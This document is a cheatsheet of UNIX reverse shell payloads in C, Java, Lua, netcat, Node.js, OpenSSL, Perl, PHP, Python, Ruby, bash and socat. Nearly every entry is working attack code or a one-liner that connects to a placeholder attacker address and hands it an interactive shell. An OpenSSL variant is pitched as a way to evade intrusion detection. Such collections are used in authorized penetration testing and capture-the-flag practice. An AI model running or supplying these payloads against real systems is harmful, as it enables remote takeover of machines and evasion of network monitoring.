UNIX Reverse Shells Cheatsheet
Table of contents
Reverse shells
C
#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>
#define REV_IP "127.0.0.1"
#define REV_PORT 4444
int main(int argc, char *argv[]) {
struct sockaddr_in sa;
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = inet_addr(REV_IP);
sa.sin_port = htons(REV_PORT);
int s = socket(AF_INET, SOCK_STREAM, 0);
connect(s, (struct sockaddr *)&sa, sizeof(sa));
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
execve("/bin/sh", 0, 0);
return 0;
}
Oneliner in shell to create and compile C reverse shell :
IP="127.0.0.1"; PORT=4444; printf "#include <stdio.h>\n#include <unistd.h>\n#include <arpa/inet.h>\n\nint main(int argc, char *argv[]){\n\tstruct sockaddr_in sa;\n\tsa.sin_family=AF_INET;\n\tsa.sin_addr.s_addr=inet_addr(\"$IP\");\n\tsa.sin_port=htons($PORT);\n\tint s = socket(AF_INET,SOCK_STREAM,0);\n\tconnect(s,(struct sockaddr *)&sa,sizeof(sa));\n\tdup2(s,0);\n\tdup2(s,1);\n\tdup2(s,2);\n\texecve(\"/bin/sh\",0,0);\n\treturn 0;\n}\n" > rev.c && gcc -Wall rev.c -o rev
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/1.2.3.4/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Lua
In a Lua script :
require('socket');
require('os');
t = socket.tcp();
t:connect('1.2.3.4','4444');
os.execute('/bin/sh -i <&3 >&3 2>&3');
Oneliner from a shell :
lua -e "require('socket');require('os');t=socket.tcp();t:connect('1.2.3.4','4444');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Netcat
Netcat.traditional
nc -e /bin/sh 1.2.3.4 4444
New netcat
mkfifo /tmp/p;nc 1.2.3.4 4444 0</tmp/p|/bin/sh -i 2>&1|tee /tmp/p
Node.js
require('child_process').exec('bash -i >& /dev/tcp/1.2.3.4/4444 0>&1');
OpenSSL
Encrypted reverse shell
An Encrypted reverse shell can help avoid automatic detection by network security monitoring tools (such as Intrusion Detection Systems (IDS)). To create one, you need to generate an SSL certificate and start an SSL listener on your attacking machine, then run the reverse shell payload on the target machine.
- Generate SSL certificate:
openssl req -x509 -quiet -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
- Start an SSL listener on your attacking machine using
openssl
:
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
- Run the payload on target machine using
openssl
:
Short payload :
mkfifo /tmp/s;/bin/sh -i</tmp/s 2>&1|openssl s_client -quiet -connect 1.2.3.4:4444>/tmp/s 2>/dev/null;rm /tmp/s
Detailled payload :
mkfifo /tmp/pipesocket
/bin/sh -i < /tmp/pipesocket 2>&1 \
| openssl s_client -quiet -connect 1.2.3.4:4444 > /tmp/pipesocket 2>/dev/null
rm/tmp/pipesocket
Perl
use Socket
$ip = "1.2.3.4";
$port = 4444;
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
if(connect(S, sockaddr_in($port, inet_aton($ip)))){
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
};
Oneliner from a shell :
perl -e 'use Socket;$i="1.2.3.4";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP
In a PHP file :
$sock = fsockopen("1.2.3.4",4444);
exec("/bin/sh -i <&3 >&3 2>&3");
Oneliner from a shell :
php -r '$sock=fsockopen("1.2.3.4",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Python
Using subprocess module
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])
Oneliner from a shell :
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Using pty module
import pty, socket, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 4444));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
pty.spawn("/bin/sh")
Oneliner from a shell :
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Ruby
f = TCPSocket.open("1.2.3.4",4444).to_i;
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Oneliner from a shell :
ruby -rsocket -e 'f=TCPSocket.open("1.2.3.4",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Shell
Shell with /dev/tcp
bash -i >& /dev/tcp/1.2.3.4/4444 0>&1
Shell with pipes and netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1.2.3.4 4444 >/tmp/f
Socat
socat tcp:1.2.3.4:4444 exec:'bash -i',pty,stderr,setsid,sigint,sane &